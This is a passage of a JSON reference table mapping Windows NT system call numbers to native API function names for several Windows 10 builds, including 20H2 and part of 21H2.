\"NtSetDriverEntryOrder\", \"401\": \"NtSetEaFile\", \"402\": \"NtSetHighEventPair\", \"403\": \"NtSetHighWaitLowEventPair\", \"404\": \"NtSetIRTimer\", \"405\": \"NtSetInformationDebugObject\", \"406\": \"NtSetInformationEnlistment\", \"407\": \"NtSetInformationJobObject\", \"408\": \"NtSetInformationKey\", \"409\": \"NtSetInformationResourceManager\", \"410\": \"NtSetInformationSymbolicLink\", \"411\": \"NtSetInformationToken\", \"412\": \"NtSetInformationTransaction\", \"413\": \"NtSetInformationTransactionManager\", \"414\": \"NtSetInformationVirtualMemory\", \"415\": \"NtSetInformationWorkerFactory\", \"416\": \"NtSetIntervalProfile\", \"417\": \"NtSetIoCompletion\", \"418\": \"NtSetIoCompletionEx\", \"419\": \"NtSetLdtEntries\", \"420\": \"NtSetLowEventPair\", \"421\": \"NtSetLowWaitHighEventPair\", \"422\": \"NtSetQuotaInformationFile\", \"423\": \"NtSetSecurityObject\", \"424\": \"NtSetSystemEnvironmentValue\", \"425\": \"NtSetSystemEnvironmentValueEx\", \"426\": \"NtSetSystemInformation\", \"427\": \"NtSetSystemPowerState\", \"428\": \"NtSetSystemTime\", \"429\": \"NtSetThreadExecutionState\", \"430\": \"NtSetTimer2\", \"431\": \"NtSetTimerEx\", \"432\": \"NtSetTimerResolution\", \"433\": \"NtSetUuidSeed\", \"434\": \"NtSetVolumeInformationFile\", \"435\": \"NtSetWnfProcessNotificationEvent\", \"436\": \"NtShutdownSystem\", \"437\": \"NtShutdownWorkerFactory\", \"438\": \"NtSignalAndWaitForSingleObject\", \"439\": \"NtSinglePhaseReject\", \"440\": \"NtStartProfile\", \"441\": \"NtStopProfile\", \"442\": \"NtSubscribeWnfStateChange\", \"443\": \"NtSuspendProcess\", \"444\": \"NtSuspendThread\", \"445\": \"NtSystemDebugControl\", \"446\": \"NtTerminateEnclave\", \"447\": \"NtTerminateJobObject\", \"448\": \"NtTestAlert\", \"449\": \"NtThawRegistry\", \"450\": \"NtThawTransactions\", \"451\": \"NtTraceControl\", \"452\": \"NtTranslateFilePath\", \"453\": \"NtUmsThreadYield\", \"454\": \"NtUnloadDriver\", \"455\": \"NtUnloadKey\", \"456\": \"NtUnloadKey2\", \"457\": \"NtUnloadKeyEx\", \"458\": \"NtUnlockFile\", \"459\": \"NtUnlockVirtualMemory\", \"460\": \"NtUnmapViewOfSectionEx\", \"461\": \"NtUnsubscribeWnfStateChange\", \"462\": \"NtUpdateWnfStateData\", \"463\": \"NtVdmControl\", \"464\": \"NtWaitForAlertByThreadId\", \"465\": \"NtWaitForDebugEvent\", \"466\": \"NtWaitForKeyedEvent\", \"467\": \"NtWaitForWorkViaWorkerFactory\", \"468\": \"NtWaitHighEventPair\", \"469\": \"NtWaitLowEventPair\", \"470\": \"NtLoadKey3\"}, \"20H2\": {\"0\": \"NtAccessCheck\", \"1\": \"NtWorkerFactoryWorkerReady\", \"2\": \"NtAcceptConnectPort\", \"3\": \"NtMapUserPhysicalPagesScatter\", \"4\": \"NtWaitForSingleObject\", \"5\": \"NtCallbackReturn\", \"6\": \"NtReadFile\", \"7\": \"NtDeviceIoControlFile\", \"8\": \"NtWriteFile\", \"9\": \"NtRemoveIoCompletion\", \"10\": \"NtReleaseSemaphore\", \"11\": \"NtReplyWaitReceivePort\", \"12\": \"NtReplyPort\", \"13\": \"NtSetInformationThread\", \"14\": \"NtSetEvent\", \"15\": \"NtClose\", \"16\": \"NtQueryObject\", \"17\": \"NtQueryInformationFile\", \"18\": \"NtOpenKey\", \"19\": \"NtEnumerateValueKey\", \"20\": \"NtFindAtom\", \"21\": \"NtQueryDefaultLocale\", \"22\": \"NtQueryKey\", \"23\": \"NtQueryValueKey\", \"24\": \"NtAllocateVirtualMemory\", \"25\": \"NtQueryInformationProcess\", \"26\": \"NtWaitForMultipleObjects32\", \"27\": \"NtWriteFileGather\", \"28\": \"NtSetInformationProcess\", \"29\": \"NtCreateKey\", \"30\": \"NtFreeVirtualMemory\", \"31\": \"NtImpersonateClientOfPort\", \"32\": \"NtReleaseMutant\", \"33\": \"NtQueryInformationToken\", \"34\": \"NtRequestWaitReplyPort\", \"35\": \"NtQueryVirtualMemory\", \"36\": \"NtOpenThreadToken\", \"37\": \"NtQueryInformationThread\", \"38\": \"NtOpenProcess\", \"39\": \"NtSetInformationFile\", \"40\": \"NtMapViewOfSection\", \"41\": \"NtAccessCheckAndAuditAlarm\", \"42\": \"NtUnmapViewOfSection\", \"43\": \"NtReplyWaitReceivePortEx\", \"44\": \"NtTerminateProcess\", \"45\": \"NtSetEventBoostPriority\", \"46\": \"NtReadFileScatter\", \"47\": \"NtOpenThreadTokenEx\", \"48\": \"NtOpenProcessTokenEx\", \"49\": \"NtQueryPerformanceCounter\", \"50\": \"NtEnumerateKey\", \"51\": \"NtOpenFile\", \"52\": \"NtDelayExecution\", \"53\": \"NtQueryDirectoryFile\", \"54\": \"NtQuerySystemInformation\", \"55\": \"NtOpenSection\", \"56\": \"NtQueryTimer\", \"57\": \"NtFsControlFile\", \"58\": \"NtWriteVirtualMemory\", \"59\": \"NtCloseObjectAuditAlarm\", \"60\": \"NtDuplicateObject\", \"61\": \"NtQueryAttributesFile\", \"62\": \"NtClearEvent\", \"63\": \"NtReadVirtualMemory\", \"64\": \"NtOpenEvent\", \"65\": \"NtAdjustPrivilegesToken\", \"66\": \"NtDuplicateToken\", \"67\": \"NtContinue\", \"68\": \"NtQueryDefaultUILanguage\", \"69\": \"NtQueueApcThread\", \"70\": \"NtYieldExecution\", \"71\": \"NtAddAtom\", \"72\": \"NtCreateEvent\", \"73\": \"NtQueryVolumeInformationFile\", \"74\": \"NtCreateSection\", \"75\": \"NtFlushBuffersFile\", \"76\": \"NtApphelpCacheControl\", \"77\": \"NtCreateProcessEx\", \"78\": \"NtCreateThread\", \"79\": \"NtIsProcessInJob\", \"80\": \"NtProtectVirtualMemory\", \"81\": \"NtQuerySection\", \"82\": \"NtResumeThread\", \"83\": \"NtTerminateThread\", \"84\": \"NtReadRequestData\", \"85\": \"NtCreateFile\", \"86\": \"NtQueryEvent\", \"87\": \"NtWriteRequestData\", \"88\": \"NtOpenDirectoryObject\", \"89\": \"NtAccessCheckByTypeAndAuditAlarm\", \"90\": \"NtQuerySystemTime\", \"91\": \"NtWaitForMultipleObjects\", \"92\": \"NtSetInformationObject\", \"93\": \"NtCancelIoFile\", \"94\": \"NtTraceEvent\", \"95\": \"NtPowerInformation\", \"96\": \"NtSetValueKey\", \"97\": \"NtCancelTimer\", \"98\": \"NtSetTimer\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAcquireCrossVmMutant\", \"104\": \"NtAcquireProcessActivityReference\", \"105\": \"NtAddAtomEx\", \"106\": \"NtAddBootEntry\", \"107\": \"NtAddDriverEntry\", \"108\": \"NtAdjustGroupsToken\", \"109\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"110\": \"NtAlertResumeThread\", \"111\": \"NtAlertThread\", \"112\": \"NtAlertThreadByThreadId\", \"113\": \"NtAllocateLocallyUniqueId\", \"114\": \"NtAllocateReserveObject\", \"115\": \"NtAllocateUserPhysicalPages\", \"116\": \"NtAllocateUserPhysicalPagesEx\", \"117\": \"NtAllocateUuids\", \"118\": \"NtAllocateVirtualMemoryEx\", \"119\": \"NtAlpcAcceptConnectPort\", \"120\": \"NtAlpcCancelMessage\", \"121\": \"NtAlpcConnectPort\", \"122\": \"NtAlpcConnectPortEx\", \"123\": \"NtAlpcCreatePort\", \"124\": \"NtAlpcCreatePortSection\", \"125\": \"NtAlpcCreateResourceReserve\", \"126\": \"NtAlpcCreateSectionView\", \"127\": \"NtAlpcCreateSecurityContext\", \"128\": \"NtAlpcDeletePortSection\", \"129\": \"NtAlpcDeleteResourceReserve\", \"130\": \"NtAlpcDeleteSectionView\", \"131\": \"NtAlpcDeleteSecurityContext\", \"132\": \"NtAlpcDisconnectPort\", \"133\": \"NtAlpcImpersonateClientContainerOfPort\", \"134\": \"NtAlpcImpersonateClientOfPort\", \"135\": \"NtAlpcOpenSenderProcess\", \"136\": \"NtAlpcOpenSenderThread\", \"137\": \"NtAlpcQueryInformation\", \"138\": \"NtAlpcQueryInformationMessage\", \"139\": \"NtAlpcRevokeSecurityContext\", \"140\": \"NtAlpcSendWaitReceivePort\", \"141\": \"NtAlpcSetInformation\", \"142\": \"NtAreMappedFilesTheSame\", \"143\": \"NtAssignProcessToJobObject\", \"144\": \"NtAssociateWaitCompletionPacket\", \"145\": \"NtCallEnclave\", \"146\": \"NtCancelIoFileEx\", \"147\": \"NtCancelSynchronousIoFile\", \"148\": \"NtCancelTimer2\", \"149\": \"NtCancelWaitCompletionPacket\", \"150\": \"NtCommitComplete\", \"151\": \"NtCommitEnlistment\", \"152\": \"NtCommitRegistryTransaction\", \"153\": \"NtCommitTransaction\", \"154\": \"NtCompactKeys\", \"155\": \"NtCompareObjects\", \"156\": \"NtCompareSigningLevels\", \"157\": \"NtCompareTokens\", \"158\": \"NtCompleteConnectPort\", \"159\": \"NtCompressKey\", \"160\": \"NtConnectPort\", \"161\": \"NtContinueEx\", \"162\": \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\", \"163\": \"NtCreateCrossVmEvent\", \"164\": \"NtCreateCrossVmMutant\", \"165\": \"NtCreateDebugObject\", \"166\": \"NtCreateDirectoryObject\", \"167\": \"NtCreateDirectoryObjectEx\", \"168\": \"NtCreateEnclave\", \"169\": \"NtCreateEnlistment\", \"170\": \"NtCreateEventPair\", \"171\": \"NtCreateIRTimer\", \"172\": \"NtCreateIoCompletion\", \"173\": \"NtCreateJobObject\", \"174\": \"NtCreateJobSet\", \"175\": \"NtCreateKeyTransacted\", \"176\": \"NtCreateKeyedEvent\", \"177\": \"NtCreateLowBoxToken\", \"178\": \"NtCreateMailslotFile\", \"179\": \"NtCreateMutant\", \"180\": \"NtCreateNamedPipeFile\", \"181\": \"NtCreatePagingFile\", \"182\": \"NtCreatePartition\", \"183\": \"NtCreatePort\", \"184\": \"NtCreatePrivateNamespace\", \"185\": \"NtCreateProcess\", \"186\": \"NtCreateProfile\", \"187\": \"NtCreateProfileEx\", \"188\": \"NtCreateRegistryTransaction\", \"189\": \"NtCreateResourceManager\", \"190\": \"NtCreateSectionEx\", \"191\": \"NtCreateSemaphore\", \"192\": \"NtCreateSymbolicLinkObject\", \"193\": \"NtCreateThreadEx\", \"194\": \"NtCreateTimer\", \"195\": \"NtCreateTimer2\", \"196\": \"NtCreateToken\", \"197\": \"NtCreateTokenEx\", \"198\": \"NtCreateTransaction\", \"199\": \"NtCreateTransactionManager\", \"200\": \"NtCreateUserProcess\", \"201\": \"NtCreateWaitCompletionPacket\", \"202\": \"NtCreateWaitablePort\", \"203\": \"NtCreateWnfStateName\", \"204\": \"NtCreateWorkerFactory\", \"205\": \"NtDebugActiveProcess\", \"206\": \"NtDebugContinue\", \"207\": \"NtDeleteAtom\", \"208\": \"NtDeleteBootEntry\", \"209\": \"NtDeleteDriverEntry\", \"210\": \"NtDeleteFile\", \"211\": \"NtDeleteKey\", \"212\": \"NtDeleteObjectAuditAlarm\", \"213\": \"NtDeletePrivateNamespace\", \"214\": \"NtDeleteValueKey\", \"215\": \"NtDeleteWnfStateData\", \"216\": \"NtDeleteWnfStateName\", \"217\": \"NtDirectGraphicsCall\", \"218\": \"NtDisableLastKnownGood\", \"219\": \"NtDisplayString\", \"220\": \"NtDrawText\", \"221\": \"NtEnableLastKnownGood\", \"222\": \"NtEnumerateBootEntries\", \"223\": \"NtEnumerateDriverEntries\", \"224\": \"NtEnumerateSystemEnvironmentValuesEx\", \"225\": \"NtEnumerateTransactionObject\", \"226\": \"NtExtendSection\", \"227\": \"NtFilterBootOption\", \"228\": \"NtFilterToken\", \"229\": \"NtFilterTokenEx\", \"230\": \"NtFlushBuffersFileEx\", \"231\": \"NtFlushInstallUILanguage\", \"232\": \"NtFlushInstructionCache\", \"233\": \"NtFlushKey\", \"234\": \"NtFlushProcessWriteBuffers\", \"235\": \"NtFlushVirtualMemory\", \"236\": \"NtFlushWriteBuffer\", \"237\": \"NtFreeUserPhysicalPages\", \"238\": \"NtFreezeRegistry\", \"239\": \"NtFreezeTransactions\", \"240\": \"NtGetCachedSigningLevel\", \"241\": \"NtGetCompleteWnfStateSubscription\", \"242\": \"NtGetContextThread\", \"243\": \"NtGetCurrentProcessorNumber\", \"244\": \"NtGetCurrentProcessorNumberEx\", \"245\": \"NtGetDevicePowerState\", \"246\": \"NtGetMUIRegistryInfo\", \"247\": \"NtGetNextProcess\", \"248\": \"NtGetNextThread\", \"249\": \"NtGetNlsSectionPtr\", \"250\": \"NtGetNotificationResourceManager\", \"251\": \"NtGetWriteWatch\", \"252\": \"NtImpersonateAnonymousToken\", \"253\": \"NtImpersonateThread\", \"254\": \"NtInitializeEnclave\", \"255\": \"NtInitializeNlsFiles\", \"256\": \"NtInitializeRegistry\", \"257\": \"NtInitiatePowerAction\", \"258\": \"NtIsSystemResumeAutomatic\", \"259\": \"NtIsUILanguageComitted\", \"260\": \"NtListenPort\", \"261\": \"NtLoadDriver\", \"262\": \"NtLoadEnclaveData\", \"263\": \"NtLoadKey\", \"264\": \"NtLoadKey2\", \"265\": \"NtLoadKeyEx\", \"266\": \"NtLockFile\", \"267\": \"NtLockProductActivationKeys\", \"268\": \"NtLockRegistryKey\", \"269\": \"NtLockVirtualMemory\", \"270\": \"NtMakePermanentObject\", \"271\": \"NtMakeTemporaryObject\", \"272\": \"NtManageHotPatch\", \"273\": \"NtManagePartition\", \"274\": \"NtMapCMFModule\", \"275\": \"NtMapUserPhysicalPages\", \"276\": \"NtMapViewOfSectionEx\", \"277\": \"NtModifyBootEntry\", \"278\": \"NtModifyDriverEntry\", \"279\": \"NtNotifyChangeDirectoryFile\", \"280\": \"NtNotifyChangeDirectoryFileEx\", \"281\": \"NtNotifyChangeKey\", \"282\": \"NtNotifyChangeMultipleKeys\", \"283\": \"NtNotifyChangeSession\", \"284\": \"NtOpenEnlistment\", \"285\": \"NtOpenEventPair\", \"286\": \"NtOpenIoCompletion\", \"287\": \"NtOpenJobObject\", \"288\": \"NtOpenKeyEx\", \"289\": \"NtOpenKeyTransacted\", \"290\": \"NtOpenKeyTransactedEx\", \"291\": \"NtOpenKeyedEvent\", \"292\": \"NtOpenMutant\", \"293\": \"NtOpenObjectAuditAlarm\", \"294\": \"NtOpenPartition\", \"295\": \"NtOpenPrivateNamespace\", \"296\": \"NtOpenProcessToken\", \"297\": \"NtOpenRegistryTransaction\", \"298\": \"NtOpenResourceManager\", \"299\": \"NtOpenSemaphore\", \"300\": \"NtOpenSession\", \"301\": \"NtOpenSymbolicLinkObject\", \"302\": \"NtOpenThread\", \"303\": \"NtOpenTimer\", \"304\": \"NtOpenTransaction\", \"305\": \"NtOpenTransactionManager\", \"306\": \"NtPlugPlayControl\", \"307\": \"NtPrePrepareComplete\", \"308\": \"NtPrePrepareEnlistment\", \"309\": \"NtPrepareComplete\", \"310\": \"NtPrepareEnlistment\", \"311\": \"NtPrivilegeCheck\", \"312\": \"NtPrivilegeObjectAuditAlarm\", \"313\": \"NtPrivilegedServiceAuditAlarm\", \"314\": \"NtPropagationComplete\", \"315\": \"NtPropagationFailed\", \"316\": \"NtPssCaptureVaSpaceBulk\", \"317\": \"NtPulseEvent\", \"318\": \"NtQueryAuxiliaryCounterFrequency\", \"319\": \"NtQueryBootEntryOrder\", \"320\": \"NtQueryBootOptions\", \"321\": \"NtQueryDebugFilterState\", \"322\": \"NtQueryDirectoryFileEx\", \"323\": \"NtQueryDirectoryObject\", \"324\": \"NtQueryDriverEntryOrder\", \"325\": \"NtQueryEaFile\", \"326\": \"NtQueryFullAttributesFile\", \"327\": \"NtQueryInformationAtom\", \"328\": \"NtQueryInformationByName\", \"329\": \"NtQueryInformationEnlistment\", \"330\": \"NtQueryInformationJobObject\", \"331\": \"NtQueryInformationPort\", \"332\": \"NtQueryInformationResourceManager\", \"333\": \"NtQueryInformationTransaction\", \"334\": \"NtQueryInformationTransactionManager\", \"335\": \"NtQueryInformationWorkerFactory\", \"336\": \"NtQueryInstallUILanguage\", \"337\": \"NtQueryIntervalProfile\", \"338\": \"NtQueryIoCompletion\", \"339\": \"NtQueryLicenseValue\", \"340\": \"NtQueryMultipleValueKey\", \"341\": \"NtQueryMutant\", \"342\": \"NtQueryOpenSubKeys\", \"343\": \"NtQueryOpenSubKeysEx\", \"344\": \"NtQueryPortInformationProcess\", \"345\": \"NtQueryQuotaInformationFile\", \"346\": \"NtQuerySecurityAttributesToken\", \"347\": \"NtQuerySecurityObject\", \"348\": \"NtQuerySecurityPolicy\", \"349\": \"NtQuerySemaphore\", \"350\": \"NtQuerySymbolicLinkObject\", \"351\": \"NtQuerySystemEnvironmentValue\", \"352\": \"NtQuerySystemEnvironmentValueEx\", \"353\": \"NtQuerySystemInformationEx\", \"354\": \"NtQueryTimerResolution\", \"355\": \"NtQueryWnfStateData\", \"356\": \"NtQueryWnfStateNameInformation\", \"357\": \"NtQueueApcThreadEx\", \"358\": \"NtRaiseException\", \"359\": \"NtRaiseHardError\", \"360\": \"NtReadOnlyEnlistment\", \"361\": \"NtRecoverEnlistment\", \"362\": \"NtRecoverResourceManager\", \"363\": \"NtRecoverTransactionManager\", \"364\": \"NtRegisterProtocolAddressInformation\", \"365\": \"NtRegisterThreadTerminatePort\", \"366\": \"NtReleaseKeyedEvent\", \"367\": \"NtReleaseWorkerFactoryWorker\", \"368\": \"NtRemoveIoCompletionEx\", \"369\": \"NtRemoveProcessDebug\", \"370\": \"NtRenameKey\", \"371\": \"NtRenameTransactionManager\", \"372\": \"NtReplaceKey\", \"373\": \"NtReplacePartitionUnit\", \"374\": \"NtReplyWaitReplyPort\", \"375\": \"NtRequestPort\", \"376\": \"NtResetEvent\", \"377\": \"NtResetWriteWatch\", \"378\": \"NtRestoreKey\", \"379\": \"NtResumeProcess\", \"380\": \"NtRevertContainerImpersonation\", \"381\": \"NtRollbackComplete\", \"382\": \"NtRollbackEnlistment\", \"383\": \"NtRollbackRegistryTransaction\", \"384\": \"NtRollbackTransaction\", \"385\": \"NtRollforwardTransactionManager\", \"386\": \"NtSaveKey\", \"387\": \"NtSaveKeyEx\", \"388\": \"NtSaveMergedKeys\", \"389\": \"NtSecureConnectPort\", \"390\": \"NtSerializeBoot\", \"391\": \"NtSetBootEntryOrder\", \"392\": \"NtSetBootOptions\", \"393\": \"NtSetCachedSigningLevel\", \"394\": \"NtSetCachedSigningLevel2\", \"395\": \"NtSetContextThread\", \"396\": \"NtSetDebugFilterState\", \"397\": \"NtSetDefaultHardErrorPort\", \"398\": \"NtSetDefaultLocale\", \"399\": \"NtSetDefaultUILanguage\", \"400\": \"NtSetDriverEntryOrder\", \"401\": \"NtSetEaFile\", \"402\": \"NtSetHighEventPair\", \"403\": \"NtSetHighWaitLowEventPair\", \"404\": \"NtSetIRTimer\", \"405\": \"NtSetInformationDebugObject\", \"406\": \"NtSetInformationEnlistment\", \"407\": \"NtSetInformationJobObject\", \"408\": \"NtSetInformationKey\", \"409\": \"NtSetInformationResourceManager\", \"410\": \"NtSetInformationSymbolicLink\", \"411\": \"NtSetInformationToken\", \"412\": \"NtSetInformationTransaction\", \"413\": \"NtSetInformationTransactionManager\", \"414\": \"NtSetInformationVirtualMemory\", \"415\": \"NtSetInformationWorkerFactory\", \"416\": \"NtSetIntervalProfile\", \"417\": \"NtSetIoCompletion\", \"418\": \"NtSetIoCompletionEx\", \"419\": \"NtSetLdtEntries\", \"420\": \"NtSetLowEventPair\", \"421\": \"NtSetLowWaitHighEventPair\", \"422\": \"NtSetQuotaInformationFile\", \"423\": \"NtSetSecurityObject\", \"424\": \"NtSetSystemEnvironmentValue\", \"425\": \"NtSetSystemEnvironmentValueEx\", \"426\": \"NtSetSystemInformation\", \"427\": \"NtSetSystemPowerState\", \"428\": \"NtSetSystemTime\", \"429\": \"NtSetThreadExecutionState\", \"430\": \"NtSetTimer2\", \"431\": \"NtSetTimerEx\", \"432\": \"NtSetTimerResolution\", \"433\": \"NtSetUuidSeed\", \"434\": \"NtSetVolumeInformationFile\", \"435\": \"NtSetWnfProcessNotificationEvent\", \"436\": \"NtShutdownSystem\", \"437\": \"NtShutdownWorkerFactory\", \"438\": \"NtSignalAndWaitForSingleObject\", \"439\": \"NtSinglePhaseReject\", \"440\": \"NtStartProfile\", \"441\": \"NtStopProfile\", \"442\": \"NtSubscribeWnfStateChange\", \"443\": \"NtSuspendProcess\", \"444\": \"NtSuspendThread\", \"445\": \"NtSystemDebugControl\", \"446\": \"NtTerminateEnclave\", \"447\": \"NtTerminateJobObject\", \"448\": \"NtTestAlert\", \"449\": \"NtThawRegistry\", \"450\": \"NtThawTransactions\", \"451\": \"NtTraceControl\", \"452\": \"NtTranslateFilePath\", \"453\": \"NtUmsThreadYield\", \"454\": \"NtUnloadDriver\", \"455\": \"NtUnloadKey\", \"456\": \"NtUnloadKey2\", \"457\": \"NtUnloadKeyEx\", \"458\": \"NtUnlockFile\", \"459\": \"NtUnlockVirtualMemory\", \"460\": \"NtUnmapViewOfSectionEx\", \"461\": \"NtUnsubscribeWnfStateChange\", \"462\": \"NtUpdateWnfStateData\", \"463\": \"NtVdmControl\", \"464\": \"NtWaitForAlertByThreadId\", \"465\": \"NtWaitForDebugEvent\", \"466\": \"NtWaitForKeyedEvent\", \"467\": \"NtWaitForWorkViaWorkerFactory\", \"468\": \"NtWaitHighEventPair\", \"469\": \"NtWaitLowEventPair\", \"470\": \"NtLoadKey3\"}, \"21H2\":{\"0\": \"NtAccessCheck\", \"41\": \"NtAccessCheckAndAuditAlarm\", \"99\": \"NtAccessCheckByType\", \"89\": \"NtAccessCheckByTypeAndAuditAlarm\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAcquireCrossVmMutant\", \"104\": \"NtAcquireProcessActivityReference\", \"655431\": \"NtAddAtom\", \"1114217\": \"NtAddAtomEx\", \"106\": \"NtAddBootEntry\", \"107\": \"NtAddDriverEntry\", \"108\": \"NtAdjustGroupsToken\", \"65\": \"NtAdjustPrivilegesToken\", \"109\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"458862\": \"NtAlertResumeThread\", \"196719\": \"NtAlertThread\", \"262256\": \"NtAlertThreadByThreadId\", \"262257\": \"NtAllocateLocallyUniqueId\", \"114\": \"NtAllocateReserveObject\", \"115\": \"NtAllocateUserPhysicalPages\", \"116\": \"NtAllocateUserPhysicalPagesEx\", \"1114229\": \"NtAllocateUuids\", \"24\": \"NtAllocateVirtualMemory\", \"118\": \"NtAllocateVirtualMemoryEx\", \"119\": \"NtAlpcAcceptConnectPort\", \"120\": \"NtAlpcCancelMessage\", \"121\": \"NtAlpcConnectPort\", \"122\": \"NtAlpcConnectPortEx\", \"123\": \"NtAlpcCreatePort\", \"124\": \"NtAlpcCreatePortSection\", \"125\": \"NtAlpcCreateResourceReserve\", \"126\": \"NtAlpcCreateSectionView\", \"127\": \"NtAlpcCreateSecurityContext\", \"128\": \"NtAlpcDeletePortSection\", \"129\": \"NtAlpcDeleteResourceReserve\", \"130\": \"NtAlpcDeleteSectionView\", \"131\": \"NtAlpcDeleteSecurityContext\", \"132\": \"NtAlpcDisconnectPort\", \"133\": \"NtAlpcImpersonateClientContainerOfPort\", \"134\": \"NtAlpcImpersonateClientOfPort\", \"135\": \"NtAlpcOpenSenderProcess\", \"136\": \"NtAlpcOpenSenderThread\", \"137\": \"NtAlpcQueryInformation\", \"138\": \"NtAlpcQueryInformationMessage\", \"139\": \"NtAlpcRevokeSecurityContext\", \"140\": \"NtAlpcSendWaitReceivePort\", \"141\": \"NtAlpcSetInformation\", \"76\": \"NtApphelpCacheControl\", \"327822\": \"NtAreMappedFilesTheSame\", \"524431\": \"NtAssignProcessToJobObject\", \"144\": \"NtAssociateWaitCompletionPacket\", \"145\": \"NtCallEnclave\", \"5\": \"NtCallbackReturn\", \"93\": \"NtCancelIoFile\", \"146\": \"NtCancelIoFileEx\", \"147\": \"NtCancelSynchronousIoFile\", \"97\": \"NtCancelTimer\", \"148\": \"NtCancelTimer2\", \"149\": \"NtCancelWaitCompletionPacket\", \"196670\": \"NtClearEvent\", \"196623\": \"NtClose\", \"59\": \"NtCloseObjectAuditAlarm\", \"150\": \"NtCommitComplete\", \"151\": \"NtCommitEnlistment\", \"152\": \"NtCommitRegistryTransaction\", \"153\": \"NtCommitTransaction\", \"154\": \"NtCompactKeys\", \"155\": \"NtCompareObjects\", \"156\": \"NtCompareSigningLevels\", \"157\": \"NtCompareTokens\", \"158\": \"NtCompleteConnectPort\", \"196767\": \"NtCompressKey\", \"160\": \"NtConnectPort\", \"67\": \"NtContinue\", \"161\": \"NtContinueEx\", \"162\": \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\", \"163\": \"NtCreateCrossVmEvent\", \"164\": \"NtCreateCrossVmMutant\", \"165\": \"NtCreateDebugObject\", \"166\": \"NtCreateDirectoryObject\", \"167\": \"NtCreateDirectoryObjectEx\", \"168\": \"NtCreateEnclave\", \"169\": \"NtCreateEnlistment\", \"72\": \"NtCreateEvent\", \"170\": \"NtCreateEventPair\", \"85\": \"NtCreateFile\", \"171\": \"NtCreateIRTimer\", \"172\": \"NtCreateIoCompletion\", \"173\": \"NtCreateJobObject\", \"174\": \"NtCreateJobSet\", \"29\": \"NtCreateKey\", \"175\": \"NtCreateKeyTransacted\", \"176\": \"NtCreateKeyedEvent\", \"177\": \"NtCreateLowBoxToken\", \"178\": \"NtCreateMailslotFile\", \"179\": \"NtCreateMutant\", \"180\": \"NtCreateNamedPipeFile\", \"181\": \"NtCreatePagingFile\", \"182\": \"NtCreatePartition\", \"183\": \"NtCreatePort\", \"184\": \"NtCreatePrivateNamespace\", \"185\": \"NtCreateProcess\", \"77\": \"NtCreateProcessEx\", \"186\": \"NtCreateProfile\", \"187\": \"NtCreateProfileEx\", \"188\": \"NtCreateRegistryTransaction\", \"189\": \"NtCreateResourceManager\", \"74\": \"NtCreateSection\", \"190\": \"NtCreateSectionEx\", \"191\": \"NtCreateSemaphore\", \"192\": \"NtCreateSymbolicLinkObject\", \"78\": \"NtCreateThread\", \"193\": \"NtCreateThreadEx\", \"194\": \"NtCreateTimer\", \"195\": \"NtCreateTimer2\", \"196\": \"NtCreateToken\", \"197\": \"NtCreateTokenEx\", \"198\": \"NtCreateTransaction\", \"199\": \"NtCreateTransactionManager\", \"200\": \"NtCreateUserProcess\", \"201\": \"NtCreateWaitCompletionPacket\", \"202\": \"NtCreateWaitablePort\", \"203\": \"NtCreateWnfStateName\", \"204\": \"NtCreateWorkerFactory\", \"524493\": \"NtDebugActiveProcess\", \"206\": \"NtDebugContinue\", \"393268\": \"NtDelayExecution\", \"262351\": \"NtDeleteAtom\", \"208\": \"NtDeleteBootEntry\", \"209\": \"NtDeleteDriverEntry\", \"210\": \"NtDeleteFile\", \"211\": \"NtDeleteKey\", \"212\": \"NtDeleteObjectAuditAlarm\", \"213\": \"NtDeletePrivateNamespace\", \"214\": \"NtDeleteValueKey\", \"215\": \"NtDeleteWnfStateData\", \"216\": \"NtDeleteWnfStateName\", \"1769479\": \"NtDeviceIoControlFile\", \"217\": \"NtDirectGraphicsCall\", \"218\": \"NtDisableLastKnownGood\", \"219\": \"NtDisplayString\", \"220\": \"NtDrawText\", \"60\": \"NtDuplicateObject\", \"66\": \"NtDuplicateToken\", \"221\": \"NtEnableLastKnownGood\", \"222\": \"NtEnumerateBootEntries\", \"223\": \"NtEnumerateDriverEntries\", \"50\": \"NtEnumerateKey\", \"224\": \"NtEnumerateSystemEnvironmentValuesEx\", \"225\": \"NtEnumerateTransactionObject\", \"19\": \"NtEnumerateValueKey\", \"226\": \"NtExtendSection\", \"227\": \"NtFilterBootOption\", \"228\": \"NtFilterToken\", \"229\": \"NtFilterTokenEx\", \"655380\": \"NtFindAtom\", \"75\": \"NtFlushBuffersFile\", \"230\": \"NtFlushBuffersFileEx\", \"231\": \"NtFlushInstallUILanguage\", \"786664\": \"NtFlushInstructionCache\", \"196841\": \"NtFlushKey\", \"234\": \"NtFlushProcessWriteBuffers\", \"235\": \"NtFlushVirtualMemory\", \"65772\": \"NtFlushWriteBuffer\", \"237\": \"NtFreeUserPhysicalPages\", \"30\": \"NtFreeVirtualMemory\", \"238\": \"NtFreezeRegistry\", \"239\": \"NtFreezeTransactions\", \"1769529\": \"NtFsControlFile\", \"240\": \"NtGetCachedSigningLevel\", \"241\": \"NtGetCompleteWnfStateSubscription\", \"242\": \"NtGetContextThread\", \"1638643\": \"NtGetCurrentProcessorNumber\", \"244\": \"NtGetCurrentProcessorNumberEx\", \"458997\": \"NtGetDevicePowerState\", \"246\": \"NtGetMUIRegistryInfo\", \"247\": \"NtGetNextProcess\", \"248\": \"NtGetNextThread\", \"249\": \"NtGetNlsSectionPtr\", \"250\": \"NtGetNotificationResourceManager\", \"251\": \"NtGetWriteWatch\", \"196860\": \"NtImpersonateAnonymousToken\", \"458783\": \"NtImpersonateClientOfPort\", \"253\": \"NtImpersonateThread\", \"254\": \"NtInitializeEnclave\", \"255\": \"NtInitializeNlsFiles\", \"256\": \"NtInitializeRegistry\", \"1114369\": \"NtInitiatePowerAction\", \"524367\": \"NtIsProcessInJob\", \"65794\": \"NtIsSystemResumeAutomatic\", \"259\": \"NtIsUILanguageComitted\", \"260\": \"NtListenPort\", \"261\": 